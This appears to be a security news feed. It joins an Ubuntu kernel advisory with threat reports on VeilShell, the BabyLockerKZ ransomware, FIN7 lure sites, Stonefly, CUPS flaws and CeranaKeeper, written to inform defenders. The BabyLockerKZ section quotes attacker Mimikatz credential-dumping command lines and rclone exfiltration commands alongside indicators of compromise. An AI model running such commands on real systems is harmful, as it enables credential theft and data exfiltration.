Ubuntu Security Notice 7021-4 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7021-4October 03, 2024linux-azure-fde-5.15 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure-fde-5.15: Linux kernel for Microsoft Azure CVM cloud systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - GPU drivers;  - BTRFS file system;  - F2FS file system;  - GFS2 file system;  - BPF subsystem;  - Netfilter;  - RxRPC session sockets;  - Integrity Measurement Architecture(IMA) framework;(CVE-2024-41009, CVE-2024-26677, CVE-2024-42160, CVE-2024-39494,CVE-2024-39496, CVE-2024-38570, CVE-2024-27012, CVE-2024-42228)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  linux-image-5.15.0-1073-azure-fde  5.15.0-1073.82~20.04.1.1  linux-image-azure-fde           5.15.0.1073.82~20.04.1.50After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7021-4  https://ubuntu.com/security/notices/USN-7021-3  https://ubuntu.com/security/notices/USN-7021-2  https://ubuntu.com/security/notices/USN-7021-1  CVE-2024-26677, CVE-2024-27012, CVE-2024-38570, CVE-2024-39494,  CVE-2024-39496, CVE-2024-41009, CVE-2024-42160, CVE-2024-42228Package Information:  https://launchpad.net/ubuntu/+source/linux-azure-fde-5.15/5.15.0-1073.82~20.04.1.1

Ubuntu Security Notice USN-7021-4

Threat actors with ties to North Korea have been observed delivering a previously undocumented backdoor and remote access trojan (RAT) called VeilShell as part of a campaign targeting Cambodia and likely other Southeast Asian countries.
The activity, dubbed SHROUDED#SLEEP by Securonix, is believed to be the handiwork of APT37, which is also known as InkySquid, Reaper, RedEyes, Ricochet Chollima,

Cyber Espionage / Threat Intelligence

Threat actors with ties to North Korea have been observed delivering a previously undocumented backdoor and remote access trojan (RAT) called VeilShell as part of a campaign targeting Cambodia and likely other Southeast Asian countries.

The activity, dubbed **SHROUDED#SLEEP** by Securonix, is believed to be the handiwork of APT37, which is also known as InkySquid, Reaper, RedEyes, Ricochet Chollima, Ruby Sleet, and ScarCruft.

Active since at least 2012, the adversarial collective is assessed to be part of North Korea's Ministry of State Security (MSS). Like with other state-aligned groups, those affiliated with North Korea, including the Lazarus Group and Kimsuky, vary in their modus operandi and likely have ever-evolving objectives based on state interests.

A key malware in its toolbox is RokRAT (aka Goldbackdoor), although the group has also developed custom tools to facilitate covert intelligence gathering.

It's currently not known how the first stage payload, a ZIP archive bearing a Windows shortcut (LNK) file, is delivered to targets. However, it's suspected that it likely involves sending spear-phishing emails.

"The \[VeilShell\] backdoor trojan allows the attacker full access to the compromised machine," researchers Den Iuzvyk and Tim Peck said in a technical report shared with The Hacker News. "Some features include data exfiltration, registry, and scheduled task creation or manipulation."

The LNK file, once launched, acts as a dropper in that it triggers the execution of PowerShell code to decode and extract next-stage components embedded into it.

This includes an innocuous lure document, a Microsoft Excel or a PDF document, that's automatically opened, distracting the user while a configuration file ("d.exe.config") and a malicious DLL ("DomainManager.dll") file are written in the background to the Windows startup folder.

Also copied to the same folder is a legitimate executable named "dfsvc.exe" that's associated with the ClickOnce technology in Microsoft .NET Framework. The file is copied as "d.exe."

What makes the attack chain stand out is the use of a lesser-known technique called AppDomainManager injection in order to execute DomainManager.dll when "d.exe" is launched at startup and the binary reads the accompanying "d.exe.config" file located in the same startup folder.

It's worth noting that this approach was recently also put to use by the China-aligned Earth Baxia actor, indicating that it is slowly gaining traction among threat actors as an alternative to DLL side-loading.

The DLL file, for its part, behaves like a simple loader to retrieve JavaScript code from a remote server, which, in turn, reaches out to a different server to obtain the VeilShell backdoor.

VeilShell is a PowerShell-based malware that's designed to contact a command-and-control (C2) server to await further instructions that allow it to gather information about files, compress a specific folder into a ZIP archive and upload it back to the C2 server, download files from a specified URL, rename and delete files, and extract ZIP archives.

"Overall, the threat actors were quite patient and methodical," the researchers noted. "Each stage of the attack features very long sleep times in an effort to avoid traditional heuristic detections. Once VeilShell is deployed it doesn't actually execute until the next system reboot."

"The SHROUDED#SLEEP campaign represents a sophisticated and stealthy operation targeting Southeast Asia leveraging multiple layers of execution, persistence mechanisms, and a versatile PowerShell-based backdoor RAT to achieve long-term control over compromised systems."

Securonix's report comes a day after Broadcom-owned Symantec revealed that the North Korean threat actor tracked as Andariel targeted three different organizations in the U.S. in August 2024 as part of a financially motivated campaign.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Hackers Using New VeilShell Backdoor in Stealthy Cyber Attacks

The malware, called "BabyLockerKZ," has primarily affected users in Europe and South America.

*   Cisco Talos has discovered a financially motivated threat actor, active since 2022, recently observed delivering a MedusaLocker ransomware variant. 
*   Intelligence collected by Talos on tools regularly employed by the threat actor allows us to see an estimate of the amount and countries of origin of this group’s victims. This actor has been active since at least late 2022 and targets organizations worldwide, although the number of victims was higher than average in EU countries until mid-2023 and, since then, in South American countries.
*   This threat actor was observed distributing a MedusaLocker ransomware variant known as “BabyLockerKZ.” This variant is compiled with a PDB path containing the word “paid\_memes” which is also present in other tools observed during the attacks, presumably by the same author.
*   Talos has new information on the attacker’s tools, including BabyLockerKz and attacker TTPs and IOCs to assist in detecting and preventing further attacks.

Talos has recently observed an attack leading to the deployment of a MedusaLocker ransomware variant known as “BabyLockerKZ.” The distinguishable techniques — including consistently storing the same set of tools in the same location on compromised systems, the use of tools that have the PDB path with the string “paid\_memes,” and the use of a lateral movement tool named “checker” — used in the attack led us to take a deeper look to try to understand more about this threat actor. 

This attacker uses several publicly known attack tools and living-off-the-land binaries (LoLBins), a set of tools built by the same developer (possibly the attacker) to assist in credential theft and lateral movement in compromised organizations. These tools are mostly wrappers around publicly available tools that include additional functionality to streamline the attack process and provide graphical or command-line interfaces. 

The same developer built the MedusaLocker variant used in the initial attack. This variant that uses the same chat and leak site URLs contains several differences to the original MedusaLocker ransomware, such as a different autorun key or an extra public and private key set stored in the registry. Based on the name of the autorun key, the attackers call this variant “BabyLockerKZ.” 

We assess with medium confidence that the actor is financially motivated, likely working as an IAB or an affiliate of a ransomware cartel, and has been carrying out attacks since at least 2022. Our telemetry indicates that the actor opportunistically targeted many victims worldwide. In late 2022 and early 2023, most victims were in European countries, but since the first quarter of 2023, the group’s focus shifted toward South American countries and, as a result, the number of victims per month almost doubled.

**Tracking BabyLockerKZ across the globe**

Intelligence collected by Talos on tools regularly employed by the threat actor allows us to estimate the number of, and the countries of origin of the victims. Although this is unlikely to capture all of the adversary’s activities, it still provides a look at a specific window of activity.

The actor has been active since at least October 2022. At that time, the targets were mostly located in European countries such as France, Germany, Spain or Italy. During the second  quarter of 2023, the attack volume per month almost doubled, and the group shifted its focus toward South American countries such as Brazil, Mexico, Argentina and Colombia, as shown in the chart below. The attacks kept a steady volume of around 200 unique IPs compromised per month until the first quarter of 2024 when the attacks decreased.

The actor has consistently compromised a large number of organizations, often more than 100 per month, since at least 2022. This reveals the professional and highly aggressive nature of the attacks and is coherent with the activity we would expect from an IAB or ransomware affiliate.

During the attack leading to the deployment of the BabyLockerKZt, the adversary used several publicly known attack tools and others that could be unique to this actor. The group frequently used the Music, Pictures or Documents user folders of compromised systems to store attack tools. For example, the following paths were used to store tools during this attack:

*   c:\\users\\<user>\\music\\advanced\_port\_scanner\_2.5.3869.exe
*   c:\\users\\<user>\\music\\hrsword\\hrsword install.bat
*   c:\\users\\<user>\\music\\killav\\build.004\\disabler.exe
*   c:/users/<user>/music/checker/checker(222).exe
*   c:/users/<user>/music/checker/invoke-thehash.ps1
*   c:/users/<user>/music/checker/checker (222).exe
*   c:/users/<user>/music/checker/invoke-smbexec.ps1
*   c:/users/<user>/music/checker/invoke-wmiexec.ps1
*   c:/users/<user>/appdata/roaming/ntsystem/ntlhost.exe.exe
*   c:/users/<user>/appdata/local/temp/advanced port scanner 2/advanced\_port\_scanner.exe
*   c:/users/<user>/appdata/local/temp/is-juad3.tmp/advanced\_port\_scanner\_2.5.3869.tmp

These are similar to a previous attack leading to MedusaLocker ransomware, documented by ASEC in February 2023, which our telemetry suggests was a more active period for this threat actor.

Some of the publicly known tools used by the attacker are:

*   HRSword\_v5.0.1.1.rar: A tool used to disable AV and EDR software.
*   Advanced\_Port\_Scanner\_2.5.3869.exe: A network-scanning tool with several additional features to map internal networks and devices.
*   Netscan.exe: SoftPerfect Network Scanner: A tool similar to Advanced Port Scanner.
*   Processhacker.exe: Process Monitoring and administration software. Allows a TA to enumerate and control processes running on the infected endpoint.
*   PCHunter64.exe: A tool similar to processhacker.
*   Mimikatz: A tool to dump Windows user credentials from memory.

While most of the tools the attacker uses are publicly available, they also use some tools that are not widely distributed that streamline the attack process by automating the interaction between popular attack tools (e.g., Mimikatz, Invoke-the-hash, PSEXEC, RDP) and by adding convenient functionality and interfaces. One of these tools, called “Checker” used in an attack that deployed BabyLockerKZ, consisted of pivotal characteristics of BabyLockerKZ, the “Checker” tool has a PDB path containing the string “**paid\_memes**”. Pivoting off this string, we identified files on VirusTotal, of which most are BabyLockerKZ samples. We also discovered several other tools, which we’ll outline below.

Checker (E:\\**paid\_memes**\\wmi\_smb\_rdp\_checker\\Release\\checker.pdb) is an app that bundles several other freely available apps and provides a GUI for management of credentials as the attackers proceed with lateral movement. In particular it contains a set of tools:

*   Remote Desktop Plus
*   PSEXEC
*   MIMIKATZ

And a set of scripts based on the Invoke-TheHash tool.

The tool also contains a GUI, as shown below, and a database to store the credentials.

As the image illustrates, the tool can be used to scan IPs for valid credentials using several protocols/techniques (PSEXEC, RDP, SMB and WMI) and is prepared to import data from lists of hosts and some of the tools in the attacker toolset, such as Mimikatz, as well as an advanced port scanner. The tool can also decrypt hashes and offers the convenience of a GUI to store a database of the hosts and respective credentials that have been obtained or verified.

**PTH project**

The PTH (D:\\Projects\\**paid\_memes**\\PTH\\Release\\PTH.pdb) name suggests the pass-the-hash technique to use NTLM hashes to authenticate remotely without having to crack the password. Looking at its resources it embeds:

*   Invoke-SMBClient.ps1
*   Invoke-SMBEnum.ps1
*   Invoke-SMBExec.ps1
*   Invoke-TheHash.ps1
*   Invoke-WMIExec.ps1

These were also used in the checker tool and are part of Invoke-TheHash. According to the author: 

_“Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.”_

MIMIK (D:\\Projects\\**paid\_memes**\\mimik\\Release\\stub\_mimik.pdb) is a wrapper around Mimikatz and rclone that can be used to steal credentials and automatically upload them to an attacker-controlled server. The following image shows the terminal output for the tool.

The following command lines are examples of commands executed via the tool:

*   64.exe privilege::debug sekurlsa::logonPasswords token::elevate lsadump::sam full exit 
*   C:\\Users\\user\\Desktop\\64.exe 64.exe "privilege::debug" "sekurlsa::logonPasswords" "token::elevate" "lsadump::sam full" exit 
*   64.exe "privilege::debug" "sekurlsa::logonPasswords" "token::elevate" "lsadump::sam full" exit
*   C:\\Users\\user\\Desktop\\rclone.exe rclone rcd --rc-no-auth --bwlimit=30M
*   C:\\Users\\user\\Desktop\\rclone.exe rclone rc operations/stat

**BabyLockerKZ**

BabyLockerKZ is a variant of MedusaLocker that has been around at least since late 2023 and has been analyzed by other researchers, although not specifically called out as a MedusaLocker variant with this name. 

A Cynet blog post on the malware used the name “Hazard” for a MedusaLocker variant (named after the extension used for encrypted files) and mentions the existence of the BabyLockerKZ registry key. 

Another post from Whitehat mentions the existence of PAIDMEMES PUBLIC and PRIVATE registry keys on a MedusaLocker sample. 

This variant has not been given much attention outside of that, though, possibly because it’s highly similar to MedusaLocker or because it uses the same chat and leak sites as MedusaLocker. But there are several notable differences between BabyLockerKZ and MedusaLocker, such as:

*   No {8761ABBD-7F85-42EE-B272-A76179687C63} mutex.
*   No MDSLK reg key.
*   The PAIDMEMES Public and private keys.
*   The BabyLockerKZ run key.

The use of the PAIDMEMES public and private keys is unclear. In their post, Whitehat mentioned that they believe the keys aren’t necessary for the encryption process, as the Linux version doesn’t use them. Further research into the use of these keys might be a topic for another blog post.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

**Open-source Snort Subscriber Rule Set** customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. SIDs for this threat: Snort3 Rules: 1:300998:1:0 Snort2 Rules: 1:63928:1:0, 1:63929:1:0

**ClamAV** detections are also available for this threat:  
Win.Ransomware.MedusaLocker-10035000-1  
Win.Tool.PassTheHash-10034996-0  
Win.Ransomware.MedusaLocker-10035000-0

**Indicators of Compromise**

IOCs for this research can be found at our Github repository here

**BabylockerKZ:**

33a8024395c56fab4564b9baef1645e505e00b0b36bff6fad3aedb666022599a

b8c994e3ed7dcc9080916119ddc315533c129479f508676d7544b82b2e24745f

63eb3d2886d9cb880c9b0d54b94f3e149b3b5b6215a33a0ef63588a09dcd4499

270c3354b3ee2940b499e365eaba143fba9d458f434dc38e663dc0f08e96121e

759b96f44806578cc0836a3a2bf11c8bc553effac72f8d28b94aec78b66be906

**PTH:**

9f066975f1e02b29c7c635280f405c59704ce4f4e06b04e9ac8a7eac22acd3c7

8bc455e5de35290f8a94376357947bd72aaf6f4d452c25a8ef444e037ef76b9f

**Checker:**

d00f7cf6af68ba832b9d364f28411346cfe66fd3b1f5bcac318766add29ff7f0

1f2df15442593b159e45d16a27e4d43d3a9062da212a588ba4c048f214a0b7be

1e9246e6a35731143368eaa0ade4f3cf576d6b22e6090152f6e94f1fa3070651

6ae3a58a78be9c606009c657de4e390538b21ad951e62b6f4d31138e1a75732c

2eddfe711c32ef1668e14a10d00452c83c29e394e17c41f491550a1583c1bcac

**HOHOL1488:**

dc4840a0992b218cbedd5a7ac5c711cb98f1f9e78a8ffdea37c694061dfd34c6

48046fb0e566f5a2d184f84b76d6cadc458762556daed0ae4a3a1200afbefb54

c0c726a23111c220d022fcd01a85f9788249e42baece03f83b6059170453b801

012657c4548d9c98223caa4cc7aa52fc083d6983d42fde16ca3271412e7fe3fe

8edbb1944d94ff91ee917c31590b6d1d5690a52fc153e44355ee9749aa0f4625

364f1b7466d8e4c9f55294ecf1f874c763bcf980c59b0250c613ac366def6aca

5d5d639fdfbf632bb7d9f1bb28731217d09d36078ab5e594baf2a5a41267a5d2

**PDB list:**

d:/projects/paid\_memes/virus/release/stub.pdb

e:/locker/bin/stub\_win\_x64\_encrypter.pdb

i:/locker/bin/stub\_win\_x64\_encrypter.pdb

d:/education/locker/bin/stub\_win\_x64\_encrypter.pdb

d:/education/locker/bin/stub\_win\_x86\_encrypter.pdb

d:/projects/paid\_memes/wmi\_smb\_rdp\_checker/release/checker.pdb

d:/projects/paid\_memes/mimik/release/stub\_mimik.pdb

i:/locker/x64/release/phantom.pdb

d:/projects/paid\_memes/pth/release/pth.pdb

**Registry keys:**

HKEY\_USERS\\%SID%\\SOFTWARE\\PAIDMEMES\\PRIVATE

HKEY\_USERS\\%SID%\\SOFTWARE\\PAIDMEMES\\PUBLIC

HKEY\_CURRENT\_USER\\SOFTWARE\\PAIDMEMES\\PUBLIC

HKEY\_CURRENT\_USER\\SOFTWARE\\PAIDMEMES\\PRIVATE

HKCU\\SOFTWARE\\PAIDMEMES\\PUBLIC

HKCU\\SOFTWARE\\PAIDMEMES\\PRIVATE

HKEY\_CURRENT\_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\BabyLockerKZ

HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\BabyLockerKZ

HKEY\_USERS\\%SID%\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\BabyLockerKZ

**Extension names observed being used by BabyLockerKZ samples:**

crypto125

crypto1317

crypto165

crypto41

crypto76

encrypted1

hazard11

hazard21

hazard23

hazard24

hazard25

hazard27

hazard31

hazard38

hazard49

hazard55

hazard56

hazard7

infected

lock2

lock3

lock5

locked9

lockfiles

meduza210

rapid1

rapid10

readtext13

readtext47

readtext49

recovery29

recovery70

virus2

virus3

virus57

**Encryption key BabyLockerKZ:**

PUTINHUILO1337

**MUTEX BabyLockerKZ:**

HOHOL1488

Threat actor believed to be spreading new MedusaLocker variant since 2022

The FIN7 group is mounting a sophisticated malware campaign that spans numerous websites, to lure people with a deepfake tool promising to create nudes out of photos.

Source: Mike via Adobe Stock Photo

The notorious FIN7 threat group is combining artificial intelligence (AI) with social engineering in an aggressive, adult-themed threat campaign that dangles lures for access to technology that can "deepfake" nude photos — all to fool people into installing infostealing malware.

The powerful Russian financial cybercrime group has created at least seven websites that advertise for what's called a "DeepNude Generator," which promises to use deepfake technology transform any photo into a nude representation of the person pictured, according to new research from the threat hunters at Silent Push.

People can either download the generator via the site or sign up for a "free trial," demonstrating the sophistication of the scam. But instead of receiving the tool, they end up downloading malicious payloads such as the stealers Lumma and Redline, which can be used to deliver further malware such as ransomware, the researchers said.

Given the provocative lure, organizations are vulnerable to the campaign, as it may entice  unsuspecting employees to download malicious files. "These files may directly compromise credentials via infostealers or be used for follow-on campaigns that deploy ransomware," according to a blog post about the research.

Meanwhile, FIN7 also continues to promote an existing malvertising campaign that targets corporate users with lures to content by popular brands — including  SAP Concur, Microsoft, Thomson Reuters, and FINVIZ stock screening —  to spread the NetSupport RAT and .MSIX malware, according to Silent Push. The researchers identified a number of active IPs and thus "active new websites" hosting the ploy, which asks people to download a fake "required browser extension," which is actually a malicious payload, to view content related to the brands.

Related:Thousands of DrayTek Routers at Risk From 14 Vulnerabilities

**Fin7 Evolves With the Times**

The DeepNude Generator campaign demonstrates particularly sophisticated thought and planning on the part of FIN7, which developed at least seven dedicated websites URLs —such as aiNude\[.\]ai, easynude\[.\]website, and ai-nude\[.\]cloud — to make it appear convincing.

There is also evidence that FIN7 is employing search engine optimization (SEO) to keep users engaged and to rank their honeypots higher in search results by using footer links to "Best Porn Sites" on its sites. Those links direct victims to other malicious sites dangling the same lure.

Moreover, the group invested effort in creating two website versions for promoting the deepfake tool. The first involves a DeepNude Generator "free download," and the second offers site visitors a DeepNude Generator "free trial," each with a different attack flow.  

Related:Python-Based Malware Slithers Into Systems via Legit VS Code

The first uses "a simple user flow" that uses a "free download" link leading users to a new domain featuring a Dropbox link or another source hosting a malicious payload, according to Silent Push.

The second attack flow prompts users via a "free trial" button to upload an image to test the generator. If this is done, the user is next prompted with a “trial is ready for download” message, with a corresponding pop-up requires the user to answer the question: "The link is for personal use only, do you agree?"

"If the user agrees and clicks 'download,' they are served a .zip file with a malicious payload" that leads to the Lumma Stealer, and which uses a DLL side-loading technique for execution, according to Silent Push.

**Mitigation & Defense Against Fin7**

The two campaigns demonstrate that FIN7 — a cybercrime collective also known as Carbanak, Carbon Spider, Cobalt Group, and Navigator Group that's been active since 2012 — remains an imminent threat despite many attempts by law enforcement to shut it down, or at least significantly disrupt it. It also shows a tenacity on the group's part to evolve with modern technology and psychological tactics to create more sophisticated ways to spread malware, the researchers said.

Related:Dragos Expands ICS Platform With New Acquisition

Indeed, FIN7 has long been known for its savvy combination of malware and social engineering, having mounted a slew of successful, financially motivated attacks against global organizations that have hauled in well over $1.2 billion — and counting — for the criminal enterprise.

To help organizations combat threats from FIN7 and other organized cybercriminal groups, developing indicators of attack based on the group's tactics, techniques, and procedures (TTPs) is one method. Also, training employees to be aware of these increasingly elaborate social engineering tactics that threat groups use, and blocking the download of any unknown any files from the Internet onto a machine connected to a corporate network also can help enterprises avoid compromise by sophisticated threat campaigns.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

AI 'Nude Photo Generator' Delivers Infostealers Instead of Images

Despite a $10 million bounty on one member, APT45 is not slowing down, pivoting from intelligence gathering to extorting funds for Kim Jong-Un's regime.

Source: Nature Picture Library via Alamy Stock Photo

A well-known North Korean advanced persistent threat (APT) has shifted its focus to targeting private companies in the US for financial gain.

Researchers at Symantec's Threat Hunter Team said this week that the state-sponsored group it tracks as "Stonefly" (aka Andariel, APT45, Silent Chollima, and Onyx Sleet) is flaunting an indictment and a $10 million bounty from the US Department of Justice (DoJ), in order to rack up more funds for the Kim Jong-Un regime.

Stonefly, which is part of North Korea's Reconnaissance General Bureau (RGB), mounted assaults on three organizations in the US in August, about a month after the DoJ moved against the group. The victims, the researchers noted, had "no obvious intelligence value," and were likely being prepped for a ransomware whammy — though the intrusions were detected before the endgame could play out.

The focus on snapping up funds is a relatively new flex for the group, Symantec researchers stressed, even though other North Korean APTs are dedicated to grifting foreign currency for the regime. Stonefly in the past targeted hospitals and other healthcare providers during the pandemic (which drew the DoJ scrutiny), and is known for going after high-value espionage targets like US Air Force bases, NASA Office of Inspector General, and government organizations in China, South Korea, and Taiwan.

"Since at least 2019, Symantec has seen its focus shift mainly to espionage operations against select, high-value targets," according to the analysis. "It appears to specialize in targeting organizations that hold classified or highly sensitive information or intellectual property … \[Stonefly had\] appeared not to be involved in financially motivated attacks."

**Look for Stonefly's IoCs to Swat Ransomware Attacks**

With Stonefly's less-targeted focus on siphoning funds from unsuspecting private companies, it pays for everyday businesses that might not normally think of themselves as APT targets to get familiar with the group's indicators of compromise (IoCs).

And there are many. While the ransomware never deployed in the August attacks, and the initial compromise path isn't clear, Stonefly still managed to smuggle in plenty of tools from its kit before being ultimately thwarted.

"In several of the attacks, Stonefly's custom malware Backdoor.Preft (aka Dtrack, Valefor) was deployed," according to Symantec's blog post. "In addition … attackers used a fake Tableau certificate documented by Microsoft in addition to two other certificates that appear to be unique to this campaign."

The toolbox also included Nukebot, which is a backdoor capable of executing commands, downloading and uploading files, and taking screenshots; Mimikatz; two different keyloggers; the Sliver open source cross-platform penetration testing framework; the PuTTY SSH client; Plink; Megatools; a utility that takes snapshots of folder structures on a hard drive and saves them as HTML files; and FastReverseProxy, which can expose local servers to the public Internet.

**About the Author**

Tara Seals has 20+ years of experience as a journalist, analyst and editor in the cybersecurity, communications and technology space. Prior to Dark Reading, Tara was Editor in Chief at Threatpost, and prior to that, the North American news lead for Infosecurity Magazine. She also spent 13 years working for Informa (formerly Virgo Publishing), as executive editor and editor-in-chief at publications focused on both the service provider and the enterprise arenas. A Texas native, she holds a B.A. from Columbia University, lives in Western Massachusetts with her family and is on a never-ending quest for good Mexican food in the Northeast.

North Korea's 'Stonefly' APT Swarms US Private Co's. for Profit

This article explores the Linux vulnerability discovered by Simone Margaritelli, which, according to cybersecurity companies Uptycs and Akamai,…

This article explores the Linux vulnerability discovered by Simone Margaritelli, which, according to cybersecurity companies Uptycs and Akamai, can be exploited for additional malicious purposes, including RCE and DDoS attacks against the Common Unix Printing System (CUPS).

Hackread.com recently **reported** a critical Linux vulnerability, discovered by cybersecurity researcher Simone Margaritelli (aka **evilsocket**), which could allow attackers to gain complete control of GNU/Linux systems, potentially allowing Linux Remote code execution. This decade-old flaw affects all GNU/Linux systems and has a severity score of 9.9 out of 10, indicating immense potential for damage if exploited. 

As per the latest updates, new findings from Cloud computing giant, Akamai, and cybersecurity firm, Uptycs, highlight an even more immediate concern: exploiting the issue for devastating DDoS attacks and carrying out remote code execution (RCE) in Linux.

****Uptycs Research****

Uptycs threat research team **identified** vulnerabilities in CUPS (Common UNIX Printing System), which can be exploited to install malicious printers and execute unauthenticated remote code execution attacks. CUPS is a widely used open-source printing system for Linux and Unix-like operating systems, allowing users to share printers on a network and manage printing jobs. 

The vulnerability resides in the cups-browsed daemon, a component that searches for available network printers. An attacker can exploit this flaw by sending a malicious packet to a vulnerable CUPS service. This packet tricks the service into fetching a non-existent printer description file from a target server specified by the attacker.

According to researchers, attackers can create a malicious PPD file and send it to a vulnerable CUPS server, requiring the cups-browsed daemon to be enabled, UDP port 631 open, and the victim to print to the malicious printer.

****Akamai Research****

Researchers at Akamai SIRT (Security Incident Response Team) also discovered a flaw that allows attackers to exploit vulnerable CUPS servers and turn them into unwitting amplifiers for distributed- denial-of-service (DDoS) attacks, allowing attackers to exploit vulnerable servers and turn them into unwitting DDoS hosts.

According to the company’s **blog post** published on October 01, 2024, the attack involves misinterpreting a UDP packet, downloading malicious data, and establishing multiple TCP connections to a target system, potentially causing an outage. 

****The Scope of the Problem:****

*   Akamai identified over 198,000 internet-connected devices running CUPS.
*   Roughly 34% (over 58,000) of these devices were vulnerable to the attack.
*   Outdated CUPS versions (released as far back as 2007) were the most susceptible.
*   Testing revealed potential amplification factors of up to 600x, significantly increasing attack power.

The issues discussed in these reports are directly related to the Linux vulnerability discovered by Margaritelli because his identified vulnerability involves a remote code execution exploit chain that targets the Common Unix Printing System (CUPS).

This exploit chain leverages several vulnerabilities, including **CVE-2024-47175** (libppd), **CVE-2024-47176** (cups-browsed), **CVE-2024-47177** (cups-filters), and **CVE-2024-47076** (libcupsfilters).

To stay protected, install the latest version of CUPS and ensure all system components, such as libcupsfilters, libppd, and cups-filters, are updated. Disable or configure cups-browsed daemon, if printing isn’t essential, or restrict access to it to trusted devices. Strengthen network security with firewalls, intrusion detection systems, and IPS, and regularly review and update security policies.

1.  **Telegram-Controlled TgRat Trojan Targets Linux Servers**
2.  **Critical Flaws Found in GNU C Library, Major Linux Distros at Risk**
3.  **Goldoon Botnet Hits D-Link Devices by Exploiting 9-Year-Old Flaw**
4.  **7-Year-Old 0-Day in Microsoft Office Exploited to Drop Cobalt Strike**
5.  **9-year-old Windows flaw dropped ZLoader malware in 111 countries**

Decade-Old Linux Vulnerability Can Be Exploited for DDoS Attacks on CUPS

A previously undocumented threat actor called CeranaKeeper has been linked to a string of data exfiltration attacks targeting Southeast Asia.
Slovak cybersecurity firm ESET, which observed campaigns targeting governmental institutions in Thailand starting in 2023, attributed the activity cluster as aligned to China, leveraging tools previously identified as used by the Mustang Panda actor.
"The

Cyber Espionage / Cloud Security

A previously undocumented threat actor called **CeranaKeeper** has been linked to a string of data exfiltration attacks targeting Southeast Asia.

Slovak cybersecurity firm ESET, which observed campaigns targeting governmental institutions in Thailand starting in 2023, attributed the activity cluster as aligned to China, leveraging tools previously identified as used by the Mustang Panda actor.

"The group constantly updates its backdoor to evade detection and diversifies its methods to aid massive data exfiltration," security researcher Romain Dumont said in an analysis published today.

"CeranaKeeper abuses popular, legitimate cloud and file-sharing services such as Dropbox and OneDrive to implement custom backdoors and extraction tools."

Some of the other countries targeted by the adversary include Myanmar, the Philippines, Japan, and Taiwan, all of which have been targeted by Chinese state-sponsored threat actors in recent years.

ESET described CeranaKeeper as relentless, creative, and capable of swiftly adapting its modus operandi, while also calling it aggressive and greedy for its ability to move laterally across compromised environments and hoover as much information as possible via various backdoors and exfiltration tools.

"Their extensive use of wildcard expressions for traversing, sometimes, entire drives clearly showed their aim was massive data siphoning," the company said.

The exact initial access routes employed by the threat actor remain unknown as yet. However, a successful initial foothold is abused to gain access to other machines on the local network, even turning some of the compromised machines into proxies or update servers to store updates for their backdoor.

The attacks are characterized by the use of malware families such as TONESHELL, TONEINS, and PUBLOAD – all attributed to the Mustang Panda group – while also making use of an arsenal of never-before-seen tools to aid data exfiltration.

"After gaining privileged access, the attackers installed the TONESHELL backdoor, deployed a tool to dump credentials, and used a legitimate Avast driver and a custom application to disable security products on the machine," Dumont said.

"From this compromised server, they used a remote administration console to deploy and execute their backdoor on other computers in the network. Additionally, CeranaKeeper used the compromised server to store updates for TONESHELL, turning it into an update server."

The newly discovered custom toolset is as follows -

*   WavyExfiller - A Python uploader that harvests data, including connected devices like USBs and hard drives, and uses Dropbox and PixelDrain as exfiltration endpoints

*   DropboxFlop - A Python DropboxFlop that's a variant of a publicly-available reverse shell called DropFlop that comes with upload and download features and uses Dropbox as a command-and-control (C&C) server

*   OneDoor - A C++ backdoor that abuses Microsoft OneDrive REST API to receive commands and exfiltrate files

*   BingoShell - A Python backdoor that abuses GitHub's pull request and issues comment features to create a stealthy reverse shell

"From a high-level point of view, \[BingoShell\] leverages a private GitHub repository as a C&C server," ESET explained. "The script uses a hard-coded token to authenticate and the pull requests and issues comments features to receive commands to execute and send back the results."

